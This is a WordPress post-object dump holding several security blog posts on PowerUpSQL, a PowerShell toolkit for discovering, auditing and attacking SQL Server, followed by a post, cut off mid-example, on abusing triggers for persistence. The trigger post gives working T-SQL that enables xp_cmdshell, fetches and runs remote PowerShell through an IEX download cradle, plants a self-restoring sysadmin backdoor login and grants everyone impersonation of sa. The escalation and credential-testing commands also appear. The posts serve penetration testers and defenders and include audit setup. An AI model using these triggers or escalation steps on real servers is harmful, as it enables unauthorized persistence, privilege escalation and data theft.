In this blog I showed how sensitive data could be targeted and quickly sampled from domain SQL Servers using PowerUpSQL. I also noted that databases that use transparent encryption tend to make good targets for review. Hopefully the scripts will save you as much time as they’ve saved us. Either way, good luck and hack responsibly! [post_title] => Finding Sensitive Data on Domain SQL Servers using PowerUpSQL [post_excerpt] => In this blog I’ll show how PowerUpSQL can be used to rapidly target and sample sensitive data stored in SQL Server databases associated with Active Directory domains. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => finding-sensitive-data-domain-sql-servers-using-powerupsql [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:43 [post_modified_gmt] => 2021-04-13 00:05:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6565 [menu_order] => 525 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [40] => WP_Post Object ( [ID] => 6640 [post_author] => 17 [post_date] => 2016-08-01 07:00:20 [post_date_gmt] => 2016-08-01 07:00:20 [post_content] => In this blog I’ll show how PowerUpSQL can be used to blindly discover SQL Server instances on a system, network, or domain. This is an essential first step if you’re planning to search for sensitive data on SQL Servers, or plan to use SQL Servers as a means to escalate privileges on the domain.

Importing PowerUpSQL

Before we get started, you’ll have to get the PowerUpSQL module imported. Below are some basic instructions. For more options visit the GitHub project here.
  1. Download PowerUpSQL.https://github.com/NetSPI/PowerUpSQL
  2. Import the Module
    PS C:\> Import-Module PowerUpSQL.psd1
Alternatively, you can load it with the PowerShell command below.
PS C:\> IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")

Discover SQL Server Instances with PowerUpSQL

Below is an overview of the PowerUpSQL discovery functions that can be used for enumerating SQL Server instances from different attacker perspectives. Each of them support the PowerShell pipeline so that they can be used with other PowerUpSQL functions.

Get-SQLInstanceLocal

This command should be used if you’ve already compromised a system and would like a list of the local SQL Server instances. It uses the local registry entries to find them. Below are a few example commands.
# Get a list of local SQL Server instances
PS C:\>Get-SQLInstanceLocal    

ComputerName       : SQLServer1
Instance           : SQLServer1\SQLEXPRESS
ServiceDisplayName : SQL Server (SQLEXPRESS)
ServiceName        : MSSQL$SQLEXPRESS
ServicePath        : "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
ServiceAccount     : NT Service\MSSQL$SQLEXPRESS
State              : Running

For more instance information pipe the Get-SQLInstanceLocal into Get-SQLServerInfo:
# Get a list of server information for each local instance
PS C:\>Get-SQLInstanceLocal | Get-SQLServerInfo

ComputerName           : SQLServer1
Instance               : SQLServer1\SQLEXPRESS
DomainName             : NETSPI
ServiceName            : MSSQL$SQLEXPRESS
ServiceAccount         : NT Service\MSSQL$SQLEXPRESS
AuthenticationMode     : Windows and SQL Server Authentication
Clustered              : No
SQLServerVersionNumber : 12.0.4213.0
SQLServerMajorVersion  : 2014
SQLServerEdition       : Express Edition (64-bit)
SQLServerServicePack   : SP1
OSArchitecture         : X64
OsMachineType          : WinNT
OSVersionName          : Windows 8.1 Pro
OsVersionNumber        : 6.3
Currentlogin           : Domain\User
IsSysadmin             : Yes
ActiveSessions         : 1

Get-SQLInstanceScanUDP

If you’re starting from an unauthenticated local network position then this function can come in handy. It returns SQL Server instances on the network from a UDP scan. It accepts a piped list of computer names or IP addresses. The example below shows how to run the UDP scan and display output to the console:
PS C:\>Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10 

ComputerName : SQLServer1
Instance     : SQLServer1\SQLEXPRESS
InstanceName : SQLEXPRESS
ServerIP     : 10.1.1.12
TCPPort      : 50213
BaseVersion  : 12.0.4100.1
IsClustered  : No

ComputerName : SQLServer1
Instance     : SQLServer1\Standard
InstanceName : Standard
ServerIP     : 10.1.1.12
TCPPort      : 50261
BaseVersion  : 12.0.4100.1
IsClustered  : No

ComputerName : SQLServer2
Instance     : SQLServer2\AppName
InstanceName : AppName
ServerIP     : 10.1.1.150
TCPPort      : 58979
BaseVersion  : 10.50.4000.0
IsClustered  : No
The example below shows how to run the UDP scan and save the list of enumerated SQL Servers to a file for later use:
PS C:\>Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP –Verbose –Threads 10 | Select-Object Instance -ExpandProperty Instance | Out-File c:\temp\test.txt
Big thanks to Eric Gruber for his work on this function!

Get-SQLInstanceFile

Sometimes you’ll already have a list of SQL Servers to target. For example, you may have already discovered SQL Server instances and saved them to a file for later use. ;) This function loads those instances from a file so they can be fed through the PowerShell pipeline into other PowerUpSQL functions. It accepts a file containing one SQL Server instance per line. Below are examples of the three formats it accepts.
  • Servername
  • Servername\Instancename
  • Servername,port
Below is a basic command example:
PS C:\> Get-SQLInstanceFile -FilePath C:\temp\instances.txt

ComputerName   Instance                      
------------   --------                      
SQLServer1    SQLServer1\SQLEXPRESS     
SQLServer1    SQLServer1\STANDARDDEV2014
SQLServer2    SQLServer2,1433    
SQLServer2    SQLServer2
The example below shows how to load a list of SQL Server instances from a file and attempt to log into each of the with the user “test” and the password “test”.
PS C:\> Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
VERBOSE: SQLServer1\SQLEXPRESS : Connection Success.
VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success.
VERBOSE: SQLServer2,1433 : Connection Failed.
VERBOSE: SQLServer2 : Connection Success.

ComputerName   Instance                  Status    
------------   --------                  ------    
SQLServer1    SQLServer1\SQLEXPRESS      Accessible
SQLServer1    SQLServer1\STANDARDDEV2014 Accessible
SQLServer2    SQLServer2,1433            Not Accessible
SQLServer2    SQLServer2                 Accessible

Get-SQLInstanceDomain

This function is useful if you’re already a domain user and looking for SQL Server targets on the domain. It returns a list of SQL Server instances discovered by querying a domain controller for systems with registered MSSQL Service Principal Names (SPNs). By default, the function will use the domain and logon server for the current domain account. However, alternative domain credentials can be provided along with and an alternative domain controller. To run as alternative domain user, use the runsas command below to launch PowerShell before importing PowerUpSQL.
runas /noprofile /netonly /user:domain\user PowerShell.exe
To simply list SQL Server instances registered on the current domain use the command below.
Get-SQLInstanceDomain –Verbose
To get a list of SQL Server instances that can be logged into with the current Windows user you can use the command below. In large environments, I think you’ll be surprised to see how many SQL Servers normal domain users can log into.
Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose –Threads 10 | Where-Object {$_.Status –eq ‘Accessible’}

Why do Domain User Accounts Have Unauthorized Access to so Many SQL Servers on the Domain?

It’s pretty common for people to doubt that members of the Active Directory group "Domain Users" would have any privileges on domain SQL Servers. However, in our experience it’s incredibly common in large environments for two reasons:
  1. Developers and SQL Server administrators have a habit of explicitly providing login privileges to all members of the Active Directory group “Domain Users”. This seems to happen a lot, because domain groups aren’t created for managing access to associated databases.
  2. When a SQL Server Express instance is installed on a domain system (and the TCP listener is enabled), a privilege inheritance chain exists that allows members of the Active Directory “Domain Users” group to log into the SQL Server instance with Public role privileges. This privilege chain is outlined in the blog “When Databases Attack: SQL Server Express Privilege Inheritance Issue“.
Due to the two common configurations described above, it’s often possible to gain a foot hold in SQL Server instances once any domain user is compromised. Naturally, this can lead to unauthorized data access, and provide the next step towards domain privilege escalation. Both topics will be covered in future blogs.

Wrap Up

In this blog I provided an overview of how SQL Server instances can be discovered with PowerUpSQL. I also provided some insight into why it’s common for standard domain users to have unauthorized access to some SQL Server instances on the domain. Hopefully the information will be useful to the red and blue teamers out there. Good luck and hack responsibly! [post_title] => Blindly Discover SQL Server Instances with PowerUpSQL [post_excerpt] => In this blog I’ll show how PowerUpSQL can be used to blindly discover SQL Server instances on a system, network, or domain. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => blindly-discover-sql-server-instances-powerupsql [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:35 [post_modified_gmt] => 2021-04-13 00:05:35 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6640 [menu_order] => 527 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [41] => WP_Post Object ( [ID] => 6359 [post_author] => 17 [post_date] => 2016-07-15 07:00:11 [post_date_gmt] => 2016-07-15 07:00:11 [post_content] => In this blog I’ll introduce the PowerUpSQL PowerShell module, which supports SQL Server instance discovery, auditing for weak configurations, and privilege escalation on scale. It primarily targets penetration testers and red teams. However, PowerUpSQL also includes many functions that could be used by administrators to inventory the SQL Servers on their ADS domain. Hopefully you'll find it as helpful as I do. The PowerUpSQL project is currently available on GitHub and the PowerShell Gallery: For those of you who are interested in an overview take a peek at the rest of the blog.

Loading PowerUpSQL

Below are three options for loading the PowerUpSQL PowerShell module.  Choose the one that works best for you. :)
  1. Install it from the PowerShell Gallery. This requires local administrative privileges and will permanently install the module.
    Install-Module -Name PowerUpSQL
  2. Download the project and import the module. This does not require administrative privileges and will only be imported into the current session. However, it may be blocked by restrictive execution policies.
    Import-Module PowerUpSQL.psd1
  3. Load it via a download cradle. This does not require administrative privileges and will only be imported into the current session. It should not be blocked by executions policies.
    IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")
    Note: To run as an alternative domain user, use the runas command to launch PowerShell prior to loading PowerUpSQL.
    runas /noprofile /netonly /user:domain\user PowerShell.exe

PowerUpSQL Overview

I’m a bit of an SQL Server enthusiast and have written a few SQL Server attack scripts in the past.  However, using the standalone scripts for attacking SQL Server is slow. Especially when they only support execution against one server at a time.  So, I rolled most of my old work into this module, so performing SQL Server recon and privilege escalation attacks could be executed a little faster and on scale.  I’m planning to continue to write functions for the module so hopefully it will get better over time. Luckily Antti Rantasaari and Eric Gruber have also been contributing some code to make my life easier. :) Below is an overview of the key design objectives met by the version 1.0 release.  A full list of available functions can be found in the readme.md of the GitHub project.

Easy Server Discovery

Blindly identify local, domain, and non-domain SQL Server instances on scale using discovery functions. The example below shows how to get a list of all of the SQL Servers with registered SPNs on the current domain.
PS C:\>Get-SQLInstanceDomain -Verbose        
VERBOSE: Grabbing SQL Server SPNs from domain...
VERBOSE: Parsing SQL Server instances from SPNs...
VERBOSE: 35 instances were found.

ComputerName               : SQLServer1.domain.com
Instance                         : SQLServer1.domain.com\STANDARDDEV2014
DomainAccountSid      : 1500000521000123456712921821222049996811922123456
DomainAccount         : SQLSvc
DomainAccountCn       : SQLSvc
Service                        : MSSQLSvc
Spn                            : MSSQLSvc/SQLServer1.domain.com:STANDARDDEV2014
LastLogon                         : 6/22/2016 9:00 AM
Description        : This is a test SQL Server.

...[SNIP]...

Easy Server Auditing

Invoke-SQLAudit audits for common high impact vulnerabilities and weak configurations using the current login's privileges. Also, Invoke-SQLDumpInfo can be used to quickly inventory databases, privileges, and other information.Below is an example showing how to dump a basic inventory list of common objects from SQL Server to CSV files.
PS C:\> Invoke-SQLDumpInfo -Verbose -Instance "SQLServer1\STANDARDDEV2014"
VERBOSE: Verified write access to output directory.
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - START 
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting non-default databases...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting database users for databases...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting privileges for databases...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting database roles...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting database role members...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting database schemas...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting database tables...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting database views...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting database columns...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting server logins...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting server config settings...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting server privileges...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting server roles...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting server role members...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting server links...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting server credentials...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting SQL Server service accounts...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting stored procedures...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting DML triggers...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting DDL triggers...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 - Getting server version information...
VERBOSE: SQLServer1.domain.com\STANDARDDEV2014 – END

A collection of .csv files should now be ready for your review. :) Now let's take it a little further. Below is an example showing how to perform an audit for common high impact configuration issues. It only includes one issue for the sake of saving space, but hopefully you get the idea.
PS C:\> Invoke-SQLAudit -Verbose -Instance "SQLServer1\STANDARDDEV2014"

...[SNIP]...

ComputerName  : SQLServer1 
Instance      : SQLServer1\STANDARDDEV2014
Vulnerability : Weak Login Password
Description   : One or more SQL Server logins is configured with a weak password.  This may provide unauthorized access to resources the affected logins have access to.             
Remediation   : Ensure all SQL Server logins are required to use a strong password. Considered inheriting the OS password policy. 
Severity      : High
IsVulnerable  : Yes
IsExploitable : Yes
Exploited     : No
ExploitCmd    : Use the affected credentials to log into the SQL Server, or rerun this command with -Exploit.
Details       : The test (Sysadmin) is configured with the password test.
Reference     : https://msdn.microsoft.com/en-us/library/ms161959.aspx
Author        : Scott Sutherland (@_nullbind), NetSPI 2016

...[SNIP]...

Note: You can also save the audit results to a CSV by using the OutFolder switch.

Easy Server Exploitation

Invoke-SQLEscalatePriv attempts to obtain sysadmin privileges using identified vulnerabilities.  Also, this is essentially the name sake function for the module. I thought "PowerUpSQL" was a fun play off of the Windows privilege escalation script PowerUp by Will Schroeder.Below is an example showing an attempt to obtain sysadmin privileges on a SQL Server using Invoke-SQLEscalatePriv. By default it will return no output so that it can be used by other scripts.  To view the results use the verbose flag.
PS C:\> Invoke-SQLEscalatePriv –Verbose –Instance “SQLServer1\Instance1”

VERBOSE: SQLServer1\Instance1: Checking if you're already a sysadmin...
VERBOSE: SQLServer1\Instance1: You're not a sysadmin, attempting to change that...
VERBOSE: LOADING VULNERABILITY CHECKS.
VERBOSE: RUNNING VULNERABILITY CHECKS.

...[SNIP]...

VERBOSE: COMPLETED ALL VULNERABILITY CHECKS.
VERBOSE: SQLServer1\Instance1 : Success! You are now a sysadmin!

Flexibility

PowerUpSQL functions support the PowerShell pipeline so they can easily be used together, or with other scripts.  For example, you can quickly get a list of non-default databases from the local server.
PS C:\> Get-SQLInstancelocal | Get-SQLDatabase –Verbose –NoDefaults

ComputerName        : SQLServer1
Instance            : SQLServer1\STANDARDDEV2014
DatabaseId          : 7
DatabaseName        : testdb
DatabaseOwner       : sa
OwnerIsSysadmin     : 1
is_trustworthy_on   : True
is_db_chaining_on   : False
is_broker_enabled   : True
is_encrypted        : False
is_read_only        : False
create_date         : 4/13/2016 4:27:36 PM
recovery_model_desc : FULL
FileName            : C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDDEV2014\MSSQL\DATA\testdb.mdf
DbSizeMb            : 3.19
has_dbaccess        : 1

...[SNIP]...

Scalability

This is the best part. Pipeline support combined with multi-threading via invoke-parallel (runspaces) allows users to execute PowerUpSQL functions against many SQL Servers very quickly. A big thank you goes out to Rambling Cookie Monster (Warren F) and Boe Prox for sharing their experiences with runspaces via blogs and GitHub. Without their work I would most likely have been stuck using PowerShell jobs. Blah.Below is a basic example showing how to identify a list of SQL Server instances that can be logged into on the domain as the current user. This is a short example, but most large organizations have thousands of instances.
PS C:\Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose -Threads 10

..[SNIP]...

ComputerName   Instance                       Status    
------------   --------                       ------    
Server1           Server1\SQLEXPRESS             Accessible
Server1           Server1\STANDARDDEV2014        Accessible
Server2           Server2\STANDARDDEV2008        Not Accessible

..[SNIP]...
To make that command even more useful I recommend setting the output to a variable so you can quickly target accessible servers. Example below:
PS C:\ $Servers = Get-SQLInstanceDomain –Verbose | Get-SQLConnectionTestThreaded –Verbose –Threads 10 | Where-Object {$_.Status –eq “Accessible”}
Then you can run other functions against accessible servers very quickly via piping. For example, grabbing server information from accessible SQL Server instances.
PS C:\$Servers | Get-SQLServerInfo –Verbose

..[SNIP]...

ComputerName           : SQLServer1
InstanceName           : SQLServer1\STANDARDDEV2014
DomainName             : Domain
ServiceName            : MSSQL$STANDARDDEV2014
ServiceAccount         : LocalSystem
AuthenticationMode     : Windows and SQL Server Authentication
Clustered              : No
SQLServerVersionNumber : 12.0.4213.0
SQLServerMajorVersion  : 2014
SQLServerEdition       : Developer Edition (64-bit)
SQLServerServicePack   : SP1
OSArchitecture         : X64Os
MachineType            : WinNT
OSVersionName          : Windows 8.1 Pro
OsVersionNumber        : 6.3
Currentlogin           : Domain\MyUser
IsSysadmin             : Yes
ActiveSessions         : 3

..[SNIP]...

Portability

Last, but not least, PowerUpSQL uses the .NET Framework sqlclient library so there are no dependencies on SQLPS or the SMO libraries. That also means you don't have to run it on a system where SQL Server has been installed. Functions have also been designed so they can be run independently.

Wrap Up

PowerUpSQL can support a lot of use cases that are helpful to both attackers and admins. As time goes on I’ll try to write some follow up blogs that touch on them. In the meantime, I hope you like the module. Feel free to submit tickets in the GitHub repository if something doesn’t work as expected. I’d love some constructive feedback. Good luck and hack responsibly!

Thanks People!

Thank you NetSPI development team for letting me pester you with stupid questions. Big thanks to Eric Gruber, Antti Rantasaari, and Khai Tran for the brain storming sessions and code contributions. Of course, that really extends to the entire NetSPI team, but this blog is already too long. :)

References

[post_title] => PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server [post_excerpt] => The PowerUpSQL module supports SQL Server instance discovery, auditing for common weak configurations, and privilege escalation on scale. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => powerupsql-powershell-toolkit-attacking-sql-server [to_ping] => [pinged] => [post_modified] => 2021-04-13 00:05:53 [post_modified_gmt] => 2021-04-13 00:05:53 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=6359 [menu_order] => 529 [post_type] => post [post_mime_type] => [comment_count] => 4 [filter] => raw ) [42] => WP_Post Object ( [ID] => 6231 [post_author] => 17 [post_date] => 2016-04-11 07:00:15 [post_date_gmt] => 2016-04-11 07:00:15 [post_content] => In this blog, we'll show how three types of SQL Server triggers can be abused to maintain access to Windows environments. We'll also take a look at some ways to detect potentially malicious triggers. For demo purposes, I've provided a PowerShell script that can be used to create malicious DDL triggers in your own lab. Hopefully the content will be useful to both red and blue teams trying to test detective capabilities within SQL Server. Below is an overview of what will be covered. Feel free to skip ahead if you don't feel like doing the lab at home. ;)

**UPDATE**

I finally found some time to add Get-SQLPersistTriggerDDL to PowerUpSQL. Below is a sample PowerUpSQL command and screenshot.

# Load PowerUpSQl in PowerShell console
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")

# Install malicious trigger
Get-SQLPersistTriggerDDL -Instance "MSSQLSRV04SQLSERVER2014" -NewSqlUser mysqluser4 -NewSqlPass NewPassword123!
Get Sqlpersisttriggerddl If you want to run through an entire attack workflow I’ve also created a command cheat sheet here.

Setting up the Lab

For those of you following along at home. I've put together some basic lab setup instructions below.
  1. I recommend using a commercial version of SQL Server so that database level auditing can be enabled. However, the actual attacks can be conducted against any version of SQL Server. If you don't have a commercial version, download the Microsoft SQL Server Express install that includes SQL Server Management Studio. It can be downloaded from https://msdn.microsoft.com/en-us/evalcenter/dn434042.aspx
  2. Install SQL Server by following the wizard, but make sure to enable mixed-mode authentication and run the service as LocalSystem for the sake of the lab.
  3. Log into the SQL Server with the "sa" account setup during installation using the SQL Server Management Studio application.
  4. Press the "New Query" button and use the TSQL below to create a database named "testdb".
    -- Create database
    CREATE DATABASE testdb
    
    -- Select database
    USE testdb
    
    -- Create table
    CREATE TABLE dbo.NOCList
    (SpyName text NOT NULL,RealName text NULL)
  5. Run the query below to add a table named "NOCList" and populate it with some records.
    -- Add sample records to table 
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('James Bond','Sean Connery')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('Ethan Hunt','Tom Cruise')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('Jason Bourne','Matt Damon')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('James Bond','Daniel Craig')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('James Bond','Pierce Bronsan')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('James Bond',Roger Moore')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('James Bond','Timothy Dolton')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('James Bond','George Lazenby')
    INSERT dbo.NOCList (SpyName, RealName)
    VALUES ('Harry Hart',' Colin Firth')
    
  6. Run the query below to add a login named "testuser".
    -- Select the testdb database
    USE testdb
    
    -- Create server login
    CREATE LOGIN [testuser] WITH PASSWORD = 'Password123!';
    
    -- Create database account for the login
    CREATE USER [testuser] FROM LOGIN [testuser];
    
    -- Assign default database for the login
    ALTER LOGIN [testuser] with default_database = [testdb];
    
    -- Add table insert privileges
    GRANT INSERT ON testdb.dbo.NOCList to [testuser]
    

Setting up the Auditing

In part 1 of this blog series we covered how to audit for potentially malicious SQL Server events like when xp_cmdshell is enabled and new sysadmins are created. In this section I'll provide some additional events that can provide context specific to potentially dangerous SQL Server triggers and login impersonation. The get started below are some instructions for setting up auditing to monitor server and database level object changes. In most production environments object changes shouldn't occur at the database or server levels very often. However, the reality is that sometimes they do. So you may have to tweak the audit setting for your environment. Either way this should get you started if you haven't seen it before.
  1. Create and enable a SERVER AUDIT so that all of our events will get forwarded to the Windows application log.
    -- Select master database
    USE master
    
    -- Create audit
    CREATE SERVER AUDIT Audit_Object_Changes
    TO APPLICATION_LOG
    WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE)
    ALTER SERVER AUDIT Audit_Object_Changes
    WITH (STATE = ON)
    
  2. Create an enabled SERVER AUDIT SPECIFICATION. This will enable auditing of defined server level events. In this case, the creation, modification, and deletion of server level objects. It will also log when user impersonation privileges are assigned and used.
    -- Create server audit specification
    CREATE SERVER AUDIT SPECIFICATION Audit_Server_Level_Object_Changes
    FOR SERVER AUDIT Audit_Object_Changes
    ADD (SERVER_OBJECT_CHANGE_GROUP),
    ADD (SERVER_OBJECT_PERMISSION_CHANGE_GROUP),
    ADD (SERVER_PERMISSION_CHANGE_GROUP),
    ADD (SERVER_PRINCIPAL_IMPERSONATION_GROUP)
    WITH (STATE = ON)
    
  3. Create an enabled DATABASE AUDIT SPECIFICATION. This will enable auditing of specific database level events. In this case, the creation, modification, and deletion of database level objects. Note: This option is only available in commercial versions of SQL Server.
    -- Create the database audit specification
    CREATE DATABASE AUDIT SPECIFICATION Audit_Database_Level_Object_Changes
    FOR SERVER AUDIT Audit_Object_Changes
    ADD (DATABASE_OBJECT_CHANGE_GROUP) 
    WITH (STATE = ON)
    GO
    
  4. Verify that auditing has been configured correctly by viewing the audit specifications with the queries below.
    --View audit server specifications
    SELECT		audit_id, 
    		a.name as audit_name, 
    		s.name as server_specification_name,
    		d.audit_action_name,
    		s.is_state_enabled,
    		d.is_group,
    		d.audit_action_id,	
    		s.create_date,
    		s.modify_date
    FROM sys.server_audits AS a
    JOIN sys.server_audit_specifications AS s
    ON a.audit_guid = s.audit_guid
    JOIN sys.server_audit_specification_details AS d
    ON s.server_specification_id = d.server_specification_id
    
    -- View database specifications
    SELECT	a.audit_id,
    		a.name as audit_name,
    		s.name as database_specification_name,
    		d.audit_action_name,
    		s.is_state_enabled,
    		d.is_group,
    		s.create_date,
    		s.modify_date,
    		d.audited_result
    FROM sys.server_audits AS a
    JOIN sys.database_audit_specifications AS s
    ON a.audit_guid = s.audit_guid
    JOIN sys.database_audit_specification_details AS d
    ON s.database_specification_id = d.database_specification_id
    
For more SQL Server auditing groups and options checkout the links below:

Malicious Trigger Creation

Based on my initial reading, there are primarily three types of triggers in SQL Server that include DML, DDL, and Logon Triggers. In this section I'll cover how each type of trigger can be used to maintain access to a Windows environment during a red team or penetration test engagement. Similar to the last blog, each trigger will be designed to add a sysadmin and execute an arbitrary PowerShell command. For the sake of the blog, all examples will be done from the perspective of an attacker that has already obtained sysadmin privileges. Note: Triggers can also be created with any login that has been provided the privileges to do so. You can view privileges with the queries at https://gist.github.com/nullbind/6da28f66cbaeeff74ed5.

Creating Malicious DDL Triggers

Data Definition Language (DDL) triggers can be applied at the Server and database levels. They can be used to take actions prior to or after DDL statements like CREATE, ALTER, and DROP. This makes DDL triggers a handy option for persistence, because they can be used when no custom databases exist on the target server. Example Code In this example, we'll create a DDL trigger designed to add a sysadmin named "SysAdmin_DDL" and execute a PowerShell script from the internet that will write a file to "c:temptrigger_demo_ddl.txt" when any login is created, altered, or deleted.
-- Enabled xp_cmdshell
sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO

sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO

-- Create the DDL trigger
CREATE Trigger [persistence_ddl_1]
ON ALL Server
FOR DDL_LOGIN_EVENTS
AS

-- Download and run a PowerShell script from the internet
EXEC master..xp_cmdshell 'Powershell -c "IEX(new-object net.webclient).downloadstring(''https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/trigger_demo_ddl.ps1'')"';

-- Add a sysadmin named 'SysAdmin_DDL' if it doesn't exist
if (SELECT count(name) FROM sys.sql_logins WHERE name like 'SysAdmin_DDL') = 0

	-- Create a login
	CREATE LOGIN SysAdmin_DDL WITH PASSWORD = 'Password123!';
	
	-- Add the login to the sysadmin fixed server role
	EXEC sp_addsrvrolemember 'SysAdmin_DDL', 'sysadmin';
GO
The next time a sysadmin creates, alters, or drops a login you should notice that a new "SysAdmin_DDL'" login and "c:temptrigger_demo_ddl.txt" file have been created. Also, if you drop the "SysAdmin_DDL'" login, the trigger just adds it back again ;). If you want to, you can also be a bit annoying with triggers. For example, the "persistence_ddl_2" trigger below can be used recreate the "persistence_ddl_1" if it is removed.
CREATE Trigger [persistence_ddl_2]
ON ALL Server 
FOR DROP_TRIGGER
AS
exec('CREATE Trigger [persistence_ddl_1]
	on ALL Server 
	for DDL_LOGIN_EVENTS
	as

	-- Download a PowerShell script from the internet to memory and execute it
	EXEC master..xp_cmdshell ''Powershell -c "IEX(new-object net.webclient).downloadstring(''''https://raw.githubusercontent.com/nullbind/Powershellery/master/Brainstorming/helloworld.ps1'''')"'';

	-- Add a sysadmin named 'SysAdmin_DDL' if it doesn't exist
	if (select count(name) from sys.sql_logins where name like ''SysAdmin_DDL'') = 0

		-- Create a login
		CREATE LOGIN SysAdmin_DDL WITH PASSWORD = ''Password123!'';
	
		-- Add the login to the sysadmin fixed server role
		EXEC sp_addsrvrolemember ''Sysadmin_DDL'', ''sysadmin'';		 
		')
You could also trigger on all "DDL_EVENTS", but I haven't done enough testing to guarantee that it wouldn't cause a production server to burst into flames. Aaanyways…if you want to confirm that your triggers were actually added you can use the query below.
SELECT * FROM sys.server_triggers 
Also, below are some links to a list of DDL trigger events that can be targeted beyond the examples provided.

Creating Malicious DML Triggers

Data Manipulation Language (DML) triggers work at the database level and can be used to take actions prior to or after DML statements like INSERT, UPDATE, or DELETE. They can be pretty useful if you target database tables where INSERT, UPDATE, or DELETE are used on a regular basis. However, there are a few downsides I'll touch on in a bit. To find popular tables to target I've provided the query below based on this post https://stackoverflow.com/questions/13638435/last-executed-queries-for-a-specific-database. It can be used to list recent queries that have been executed that include INSERT statements. If you created the test database and table in the "Setting up the Lab" section you should see the associated insert statements.
-- List popular tables that use INSERT statements
SELECT * FROM 
	(SELECT 
	COALESCE(OBJECT_NAME(qt.objectid),'Ad-Hoc') AS objectname,
	qt.objectid as objectid,
	last_execution_time,
	execution_count,
	encrypted,
    (SELECT TOP 1 SUBSTRING(qt.TEXT,statement_start_offset / 2+1,( (CASE WHEN statement_end_offset = -1 THEN (LEN(CONVERT(NVARCHAR(MAX),qt.TEXT)) * 2) ELSE statement_end_offset END)- statement_start_offset) / 2+1)) AS sql_statement
	FROM sys.dm_exec_query_stats AS qs
	CROSS APPLY sys.dm_exec_sql_text(sql_handle) AS qt ) x
WHERE sql_statement like 'INSERT%'
ORDER BY execution_count DESC
Example Code In this example, we'll create a DML trigger designed to add a sysadmin named "SysAdmin_DML" and execute a PowerShell script from the internet that will write a file to "c:temptrigger_demo_dml.txt" when an INSERT event occurs in the testdb.dbo.noclist table. IMPORTANT NOTE: The downside is that least privilege database users inserting records into the database we are going to create our trigger for may not have the privileges required to run the xp_cmdshell etc. To work around that, the script below provides everyone (public) with the privileges to impersonate the sa account. Alternatively, you could configure the xp_cmdshell proxy account or reconfigure the malicious trigger to execute as a sysadmin. While attackers may use any of these methods, changing privileges really shouldn't be done during pentests, because it weakens the security controls of the environment.  However, I'm doing it here so we can see the changes in the log.
-- Select master database
USE master

-- Grant all users privileges to impersonate sa (bad idea for pentesters)
GRANT IMPERSONATE ON LOGIN::sa to [Public];

-- Select testdb database
USE testdb

-- Create trigger
CREATE TRIGGER [persistence_dml_1]
ON testdb.dbo.NOCList 
FOR INSERT, UPDATE, DELETE AS

-- Impersonate sa
EXECUTE AS LOGIN = 'sa'

-- Download a PowerShell script from the internet to memory and execute it
